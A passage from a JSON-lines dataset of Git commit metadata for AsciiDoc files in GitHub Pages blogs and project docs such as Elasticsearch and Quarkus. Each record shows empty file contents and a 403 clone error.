lo-FullStack\/Desarrollo-FullStack.github.io,Rackcore\/Rackcore.github.io,iveskins\/iveskins.github.io,Le6ow5k1\/le6ow5k1.github.io,alexandrev\/alexandrev.github.io,txemis\/txemis.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,KurtStam\/kurtstam.github.io,tr00per\/tr00per.github.io,rohithkrajan\/rohithkrajan.github.io,zouftou\/zouftou.github.io,doochik\/doochik.github.io,henryouly\/henryouly.github.io,minicz\/minicz.github.io,xurei\/xurei.github.io,gquintana\/gquintana.github.io,NadineLaCuisine\/NadineLaCuisine.github.io,minditech\/minditech.github.io,raytong82\/raytong82.github.io,cmolitor\/blog,codechunks\/codechunks.github.io,jlboes\/jlboes.github.io,thykka\/thykka.github.io,icthieves\/icthieves.github.io,Nekothrace\/nekothrace.github.io,naru0504\/hubpress.io,vvani06\/hubpress-test,TsungmingLiu\/tsungmingliu.github.io,mattbarton\/mattbarton.github.io,Lh4cKg\/Lh4cKg.github.io,eyalpost\/eyalpost.github.io,randhson\/Blog,apalkoff\/apalkoff.github.io,yejodido\/hubpress.io,dvmoomoodv\/hubpress.io,mattpearson\/mattpearson.github.io,mahrocks\/mahrocks.github.io,Mynor-Briones\/mynor-briones.github.io,murilo140891\/murilo140891.github.io,never-ask-never-know\/never-ask-never-know.github.io,kzmenet\/kzmenet.github.io,alchapone\/alchapone.github.io,netrunnerX\/netrunnerx.github.io,dannylane\/dannylane.github.io,txemis\/txemis.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,blogforfun\/blogforfun.github.io,Mentaxification\/Mentaxification.github.io,nectia-think\/nectia-think.github.io,lerzegov\/lerzegov.github.io,jabby\/jabby.github.io,mouseguests\/mouseguests.github.io,velo\/velo.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,johnkellden\/github.io,demo-hubpress\/demo,sidmusa\/sidmusa.github.io,iwakuralai-n\/badgame-site,blahcadepodcast\/blahcadepodcast.github.io,fqure\/fqure.github.io,coder-ze\/coder-ze.github.io,laura-arreola\/laura-arreola.github.io,silviu\/silviu.github.io,jankolorenc\/jankolorenc.github.io,pavistalli\/pavistalli.github.io,thockenb\/thockenb.github.io,nullbase\/nullbase.github.io,kay\/kay.github.io,sskorol\/sskorol.github.io,warpcoil\/warpcoil.github.io,der3k\/der3k.github.io,atfd\/hubpress.io,heliomsolivas\/heliomsolivas.github.io,luzhox\/mejorandola.github.io,icthieves\/icthieves.github.io,milantracy\/milantracy.github.io,skeate\/skeate.github.io,coder-ze\/coder-ze.github.io,kreids\/kreids.github.io,triskell\/triskell.github.io,mager19\/mager19.github.io,ovo-6\/ovo-6.github.io,wols\/time,spikebachman\/spikebachman.github.io,jelitox\/jelitox.github.io,mazongo\/mazongo.github.io,hapee\/hapee.github.io,quangpc\/quangpc.github.io,iwakuralai-n\/badgame-site,scottellis64\/scottellis64.github.io,DominikVogel\/DominikVogel.github.io,noahrc\/noahrc.github.io,IdoramNaed\/idoramnaed.github.io,lifengchuan2008\/lifengchuan2008.github.io,gruenberg\/gruenberg.github.io,chaseey\/chaseey.github.io,mozillahonduras\/mozillahonduras.github.io,vba\/vba.github.io,javathought\/javathought.github.io,caseyy\/caseyy.github.io,martinteslastein\/martinteslastein.github.io,ricardozanini\/ricardozanini.github.io,neurodiversitas\/neurodiversitas.github.io,pwlprg\/pwlprg.github.io,JithinPavithran\/JithinPavithran.github.io,wattsap\/wattsap.github.io,osada9000\/osada9000.github.io,amuhle\/amuhle.github.io,ilyaeck\/ilyaeck.github.io,AlonsoCampos\/AlonsoCampos.github.io,elenampva\/elenampva.github.io,willnewby\/willnewby.github.io,scriptindex\/scriptindex.github.io,SBozhko\/sbozhko.github.io,xumr0x\/xumr0x.github.io,MattBlog\/mattblog.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,qu85101522\/qu85101522.github.io,anshu92\/blog,TeksInHelsinki\/TeksInHelsinki.github.io,sidemachine\/sidemachine.github.io,pamasse\/pamasse.github.io,KurtStam\/kurtstam.github.io,saptaksen\/saptaksen.github.io,LearningTools\/LearningTools.github.io,TheGertproject\/TheGertproject.github.io,ElteHupkes\/eltehupkes.github.io,in2erval\/in2erval.github.io,Cnlouds\/cnlouds.github.io,14FRS851\/14FRS851.github.io,rlebron88\/rlebron88.github.io,silviu\/silviu.github.io,seatones\/seatones.github.io,scottellis64\/scottellis64.github.io,FSUgenomics\/hubpress.io,macchandev\/macchandev.github.io,yahussain\/yahussain.github.io,jkschneider\/jkschneider.github.io,BulutKAYA\/bulutkaya.github.io,jarbro\/jarbro.github.io,topicusonderwijs\/topicusonderwijs.github.io,cringler\/cringler.github.io,kimkha-blog\/kimkha-blog.github.io,akoskovacsblog\/akoskovacsblog.github.io,jaganz\/jaganz.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,Wurser\/wurser.github.io,mikealdo\/mikealdo.github.io,miroque\/shirokuma,neomobil\/neomobil.github.io,polarbill\/polarbill.github.io,zakkum42\/zakkum42.github.io,pysaumont\/pysaumont.github.io,plaidshirtguy\/plaidshirtguy.github.io,geummo\/geummo.github.io,Astalaseven\/astalaseven.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,furcon\/furcon.github.io,modmaker\/modmaker.github.io,faldah\/faldah.github.io,bluenergy\/bluenergy.github.io,jblemee\/jblemee.github.io,TunnyTraffic\/gh-hosting,dingboopt\/dingboopt.github.io,crotel\/crotel.github.com,studiocardo\/studiocardo.github.io,pdudits\/pdudits.github.io,fr-developer\/fr-developer.github.io,pysaumont\/pysaumont.github.io,metasean\/blog,heberqc\/heberqc.github.io,arthurmolina\/arthurmolina.github.io,thomaszahr\/thomaszahr.github.io,RandomWebCrap\/randomwebcrap.github.io,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,FRC125\/FRC125.github.io,jia1miao\/jia1miao.github.io,xvin3t\/xvin3t.github.io,kosssi\/blog,jivank\/jivank.github.io,fr-developer\/fr-developer.github.io,duarte-fonseca\/duarte-fonseca.github.io,acristyy\/acristyy.github.io,tkountis\/tkountis.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,Aferide\/Aferide.github.io,kai-cn\/kai-cn.github.io,sidemachine\/sidemachine.github.io,sebbrousse\/sebbrousse.github.io,realraindust\/realraindust.github.io,costalfy\/costalfy.github.io,chakbun\/chakbun.github.io,xumr0x\/xumr0x.github.io,xvin3t\/xvin3t.github.io,gudhakesa\/gudhakesa.github.io,maurodx\/maurodx.github.io,ghostbind\/ghostbind.github.io,kunicmarko20\/kunicmarko20.github.io,datumrich\/datumrich.github.io,qeist\/qeist.github.io,xavierdono\/xavierdono.github.io,Aerodactyl\/aerodactyl.github.io,thezorgan\/thezorgan.github.io,codingkapoor\/codingkapoor.github.io,matthewbadeau\/matthewbadeau.github.io,deivisk\/deivisk.github.io,zakkum42\/zakkum42.github.io,mahrocks\/mahrocks.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,Akanoa\/akanoa.github.io,kai-cn\/kai-cn.github.io,topicusonderwijs\/topicusonderwijs.github.io,yejodido\/hubpress.io,uzuyh\/hubpress.io,mattdoesinfosec\/mattdoesinfosec.github.io,Andy4Craft\/andy4craft.github.io,s-f-ek971\/s-f-ek971.github.io,IdoramNaed\/idoramnaed.github.io,dvmoomoodv\/hubpress.io,scriptindex\/scriptindex.github.io,jarbro\/jarbro.github.io,MichaelIT\/MichaelIT.github.io,jarbro\/jarbro.github.io,bithunshal\/shalsblog,oppemism\/oppemism.github.io,ntfnd\/ntfnd.github.io,Easter-Egg\/Easter-Egg.github.io,kubevirt\/blog,ghostbind\/ghostbind.github.io,s-f-ek971\/s-f-ek971.github.io,Adyrhan\/adyrhan.github.io,hhimanshu\/hhimanshu.github.io,uzuyh\/hubpress.io,live-smart\/live-smart.github.io,murilo140891\/murilo140891.github.io,tjfy1992\/tjfy1992.github.io,ennerf\/ennerf.github.io,Bachaco-ve\/bachaco-ve.github.io,unay-cilamega\/unay-cilamega.github.io,rage5474\/rage5474.github.io,bitcowboy\/bitcowboy.github.io,darsto\/darsto.github.io,oppemism\/oppemism.github.io,puzzles-engineer\/puzzles-engineer.github.io,Driven-Development\/Driven-Development.github.io,SBozhko\/sbozhko.github.io,nbourdin\/nbourdin.github.io,carlomorelli\/carlomorelli.github.io,2wce\/2wce.github.io,fbiville\/fbiville.github.io,Nekothrace\/nekothrace.github.io,stevenxzhou\/alex1007.github.io,nanox77\/nanox77.github.io,never-ask-never-know\/never-ask-never-know.github.io,fbiville\/fbiville.github.io,bencekiraly\/bencekiraly.github.io,mikealdo\/mikealdo.github.io,hutchr\/hutchr.github.io,MartinAhrer\/martinahrer.github.io,esbrannon\/esbrannon.github.io,AppHat\/AppHat.github.io,hami-jp\/hami-jp.github.io,birvajoshi\/birvajoshi.github.io,lyqiangmny\/lyqiangmny.github.io,Andy4Craft\/andy4craft.github.io,henning-me\/henning-me.github.io,jelitox\/jelitox.github.io,elvarb\/elvarb.github.io,qeist\/qeist.github.io,blater\/blater.github.io,hfluz\/hfluz.github.io,CBSti\/CBSti.github.io,FRC125\/FRC125.github.io,nanox77\/nanox77.github.io,diogoan\/diogoan.github.io,zakkum42\/zakkum42.github.io,lyqiangmny\/lyqiangmny.github.io,txemis\/txemis.github.io,vvani06\/hubpress-test,dakeshi\/dakeshi.github.io,Ugotsta\/Ugotsta.github.io,codingkapoor\/codingkapoor.github.io,lxjk\/lxjk.github.io,caglarsayin\/hubpress,lifengchuan2008\/lifengchuan2008.github.io,hitamutable\/hitamutable.github.io,unay-cilamega\/unay-cilamega.github.io,rizalp\/rizalp.github.io,live-smart\/live-smart.github.io,pdudits\/pdudits.github.io,mattburnin\/hubpress.io,wanjee\/wanjee.github.io,cloudmind7\/cloudmind7.github.com,jaredmorgs\/jaredmorgs.github.io,vvani06\/hubpress-test,juliardi\/juliardi.github.io,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,Dhuck\/dhuck.github.io,spe\/spe.github.io.hubpress,javathought\/javathought.github.io,msravi\/msravi.github.io,nickwanhere\/nickwanhere.github.io,rushil-patel\/rushil-patel.github.io,willyb321\/willyb321.github.io,seatones\/seatones.github.io,pallewela\/pallewela.github.io,yysk\/yysk.github.io,pamasse\/pamasse.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,xavierdono\/xavierdono.github.io,acien101\/acien101.github.io,jbutzprojects\/jbutzprojects.github.io,ylliac\/ylliac.github.io,blackgun\/blackgun.github.io,TunnyTraffic\/gh-hosting,psicrest\/psicrest.github.io,FRC125\/FRC125.github.io,iwangkai\/iwangkai.github.io,iwangkai\/iwangkai.github.io,srevereault\/srevereault.github.io,iolabailey\/iolabailey.github.io,anggadjava\/anggadjava.github.io,thiderman\/daenney.github.io,mattpearson\/mattpearson.github.io,bahamoth\/bahamoth.github.io,tedroeloffzen\/tedroeloffzen.github.io,raloliver\/raloliver.github.io,epayet\/blog,amodig\/amodig.github.io,wanjee\/wanjee.github.io,raytong82\/raytong82.github.io,emilio2hd\/emilio2hd.github.io,YvonneZhang\/yvonnezhang.github.io,tofusoul\/tofusoul.github.io,daemotron\/daemotron.github.io,chrizco\/chrizco.github.io,karcot\/trial1,Ardemius\/ardemius.github.io,psicrest\/psicrest.github.io,railsdev\/railsdev.github.io,rushil-patel\/rushil-patel.github.io,PauloMoekotte\/PauloMoekotte.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,kfkelvinng\/kfkelvinng.github.io,iveskins\/iveskins.github.io,RaphaelSparK\/RaphaelSparK.github.io,glitched01\/glitched01.github.io,3991\/3991.github.io,murilo140891\/murilo140891.github.io,adler-j\/adler-j.github.io,AgustinQuetto\/AgustinQuetto.github.io,nobodysplace\/nobodysplace.github.io,IndianLibertarians\/indianlibertarians.github.io,GDGSriLanka\/blog,chris1234p\/chris1234p.github.io,tedroeloffzen\/tedroeloffzen.github.io,chaseey\/chaseey.github.io,ovo-6\/ovo-6.github.io,Astalaseven\/astalaseven.github.io,bluenergy\/bluenergy.github.io,vs4vijay\/vs4vijay.github.io,nnn-dev\/nnn-dev.github.io,vba\/vba.github.io,theofilis\/theofilis.github.io,modmaker\/modmaker.github.io,theofilis\/theofilis.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,xmichaelx\/xmichaelx.github.io,willyb321\/willyb321.github.io,sfoubert\/sfoubert.github.io,therebelrobot\/blog-n.ode.rocks,nnn-dev\/nnn-dev.github.io,Motsai\/old-repo-to-mirror,mnishihan\/mnishihan.github.io,eyalpost\/eyalpost.github.io,ashelle\/ashelle.github.io,acristyy\/acristyy.github.io,mazongo\/mazongo.github.io,raditv\/raditv.github.io,niole\/niole.github.io,stratdi\/stratdi.github.io,acristyy\/acristyy.github.io,fgracia\/fgracia.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,kay\/kay.github.io,cncgl\/cncgl.github.io,alexgaspard\/alexgaspard.github.io,amodig\/amodig.github.io,raytong82\/raytong82.github.io,hildjj\/hildjj.github.io,introspectively\/introspectively.github.io,carsnwd\/carsnwd.github.io,jia1miao\/jia1miao.github.io,xumr0x\/xumr0x.github.io,chris1234p\/chris1234p.github.io,FSUgenomics\/hubpress.io,fuhrerscene\/fuhrerscene.github.io,wheeliz\/tech-blog,uzuyh\/hubpress.io,lovian\/lovian.github.io,gajumaru4444\/gajumaru4444.github.io,lovian\/lovian.github.io,havvazaman\/havvazaman.github.io,elenampva\/elenampva.github.io,gudhakesa\/gudhakesa.github.io,markfetherolf\/markfetherolf.github.io,RandomWebCrap\/randomwebcrap.github.io,skeate\/skeate.github.io,n15002\/main,chaseconey\/chaseconey.github.io,fqure\/fqure.github.io,willyb321\/willyb321.github.io,masonc15\/masonc15.github.io,pzmarzly\/pzmarzly.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,Vtek\/vtek.github.io,codechunks\/codechunks.github.io,emilio2hd\/emilio2hd.github.io,hbbalfred\/hbbalfred.github.io,camilo28\/camilo28.github.io,anuragsingh31\/anuragsingh31.github.io,blogforfun\/blogforfun.github.io,timelf123\/timelf123.github.io,rohithkrajan\/rohithkrajan.github.io,rvegas\/rvegas.github.io,karcot\/trial1,theblankpages\/theblankpages.github.io,popurax\/popurax.github.io,conchitawurst\/conchitawurst.github.io,debbiezhu\/debbiezhu.github.io,ThomasLT\/thomaslt.github.io,nikogamulin\/nikogamulin.github.io,locnh\/locnh.github.io,lucasferraro\/lucasferraro.github.io,chdask\/chdask.github.io,mmhchan\/mmhchan.github.io,KozytyPress\/kozytypress.github.io,gsera\/gsera.github.io,wattsap\/wattsap.github.io,pysaumont\/pysaumont.github.io,conchitawurst\/conchitawurst.github.io,foxsofter\/hubpress.io,qeist\/qeist.github.io,alphaskade\/alphaskade.github.io,pysysops\/pysysops.github.io,mozillahonduras\/mozillahonduras.github.io,MatanRubin\/MatanRubin.github.io,rdspring1\/rdspring1.github.io,imukulsharma\/imukulsharma.github.io,kreids\/kreids.github.io,Fendi-project\/fendi-project.github.io,ferandec\/ferandec.github.io,mnishihan\/mnishihan.github.io,railsdev\/railsdev.github.io,bahamoth\/bahamoth.github.io,jbroszat\/jbroszat.github.io,fadlee\/fadlee.github.io,Roen00\/roen00.github.io,cothan\/cothan.github.io,kimkha-blog\/kimkha-blog.github.io,crimarde\/crimarde.github.io,backemulus\/backemulus.github.io,Brandywine2161\/hubpress.io,frenchduff\/frenchduff.github.io,srevereault\/srevereault.github.io,atfd\/hubpress.io,mastersk3\/hubpress.io,siarlex\/siarlex.github.io,emilio2hd\/emilio2hd.github.io,yahussain\/yahussain.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,abien\/abien.github.io,fasigpt\/fasigpt.github.io,mager19\/mager19.github.io,acien101\/acien101.github.io,hitamutable\/hitamutable.github.io,sskorol\/sskorol.github.io,YannBertrand\/yannbertrand.github.io,topranks\/topranks.github.io,ronanki\/ronanki.github.io,quentindemolliens\/quentindemolliens.github.io,mnishihan\/mnishihan.github.io,SRTjiawei\/SRTjiawei.github.io,gruenberg\/gruenberg.github.io,marioandres\/marioandres.github.io,tomas\/tomas.github.io,lerzegov\/lerzegov.github.io,markfetherolf\/markfetherolf.github.io,juliardi\/juliardi.github.io,raisedadead\/hubpress.io,ahopkins\/amhopkins.com,fasigpt\/fasigpt.github.io,ghostbind\/ghostbind.github.io,willnewby\/willnewby.github.io,msravi\/msravi.github.io,mozillahonduras\/mozillahonduras.github.io,Murazaki\/murazaki.github.io,jelitox\/jelitox.github.io,mikaman\/mikaman.github.io,KozytyPress\/kozytypress.github.io,marchelo2212\/marchelo2212.github.io,johannewinwood\/johannewinwood.github.io,TinkeringAlways\/tinkeringalways.github.io,peter-lawrey\/peter-lawrey.github.io,chris1234p\/chris1234p.github.io,carlosdelfino\/carlosdelfino-hubpress,jkamke\/jkamke.github.io,mkaptein172\/mkaptein172.github.io,Le6ow5k1\/le6ow5k1.github.io,3991\/3991.github.io,reggert\/reggert.github.io,metasean\/hubpress.io,cdelmas\/cdelmas.github.io,kubevirt\/blog,sskorol\/sskorol.github.io,blitzopteron\/ApesInc,thomasgwills\/thomasgwills.github.io,B3H1NDu\/b3h1ndu.github.io,bitcowboy\/bitcowboy.github.io,jrhea\/jrhea.github.io,amuhle\/amuhle.github.io,fadlee\/fadlee.github.io,yahussain\/yahussain.github.io,maurodx\/maurodx.github.io,vanpelt\/vanpelt.github.io,evolgenomology\/evolgenomology.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,holtalanm\/holtalanm.github.io,txemis\/txemis.github.io,gardenias\/sddb.com,xquery\/xquery.github.io,Aferide\/Aferide.github.io,mkaptein172\/mkaptein172.github.io,jaganz\/jaganz.github.io,pysaumont\/pysaumont.github.io,roelvs\/roelvs.github.io,prateekjadhwani\/prateekjadhwani.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,metasean\/blog,tosun-si\/tosun-si.github.io,izziiyt\/izziiyt.github.io,jkschneider\/jkschneider.github.io,carsnwd\/carsnwd.github.io,twentyTwo\/twentyTwo.github.io,hoernschen\/hoernschen.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,xavierdono\/xavierdono.github.io,fgracia\/fgracia.github.io,imukulsharma\/imukulsharma.github.io,jarcane\/jarcane.github.io,jonathandmoore\/jonathandmoore.github.io,AlonsoCampos\/AlonsoCampos.github.io,fadlee\/fadlee.github.io,dingboopt\/dingboopt.github.io,hotfloppy\/hotfloppy.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,fuzzy-logic\/fuzzy-logic.github.io,hatohato25\/hatohato25.github.io,apalkoff\/apalkoff.github.io,IdoramNaed\/idoramnaed.github.io,jborichevskiy\/jborichevskiy.github.io,sidmusa\/sidmusa.github.io,furcon\/furcon.github.io,ovo-6\/ovo-6.github.io,heliomsolivas\/heliomsolivas.github.io,niole\/niole.github.io,Wurser\/wurser.github.io,livehua\/livehua.github.io,rballan\/rballan.github.io,B3H1NDu\/b3h1ndu.github.io,elvarb\/elvarb.github.io,mubix\/blog.room362.com","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codingkapoor\/codingkapoor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b685c50984d20d0de8bd41de31ed0be60bf9647","subject":"Delete README-pt.adoc","message":"Delete README-pt.adoc","repos":"gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io","old_file":"README-pt.adoc","new_file":"README-pt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsha0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7449cc8de5b784c770f1edc96e1587d428d9887","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb596fc76766750aacdaca70ac0ca42a4c70e03c","subject":"Fix license section","message":"Fix license section\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f6af2e4b6818dcaa2e5664ebce960747b28b2f4","subject":"Update 2015-10-15-Database-review.adoc","message":"Update 2015-10-15-Database-review.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-15-Database-review.adoc","new_file":"_posts\/2015-10-15-Database-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73c41471bb973a8bfb27249aee4beb6e35ea84d5","subject":"Deleted _posts\/2017-06-13-Making-a-change.adoc","message":"Deleted _posts\/2017-06-13-Making-a-change.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Making-a-change.adoc","new_file":"_posts\/2017-06-13-Making-a-change.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d76a347ce914d1c2cdba5b18f14b43f02b30e31d","subject":"Update 2018-02-27-When-the-RTFM-sucks.adoc","message":"Update 2018-02-27-When-the-RTFM-sucks.adoc","repos":"costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io","old_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/costalfy\/costalfy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"344b9a618e75bfa4407e126e4fef21447836015d","subject":"Blogpost about externalized secrets","message":"Blogpost about externalized secrets\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-12-13-externalized-secrets.adoc","new_file":"blog\/2019-12-13-externalized-secrets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a5f5280f7fae798cfaa4d68fa056471c374ec84","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3744f7c22d27dd89a52dd3603b60c69ba584195c","subject":"Doc for Elytron Security JDBC","message":"Doc for Elytron Security JDBC\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/security-jdbc-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/security-jdbc-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9dfb2a215c2ed32a94913e05296005add5ffb98","subject":"Fix another simulate example in ingest docs","message":"Fix another simulate example in ingest docs\n\nWhen simulating an ingest pipeline against an existing pipeline, the\r\n_source field is required to wrap each doc. This commit fixes another\r\nexample in the docs that is missing this.\r\n \r\nRelates #25743, relates e3a0c11239c3923f876ecbb310346aadadf1d902\r\n","repos":"s1monw\/elasticsearch,pozhidaevak\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra,sneivandt\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,HonzaKral\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,qwerty4030\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,s1monw\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,fred84\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_f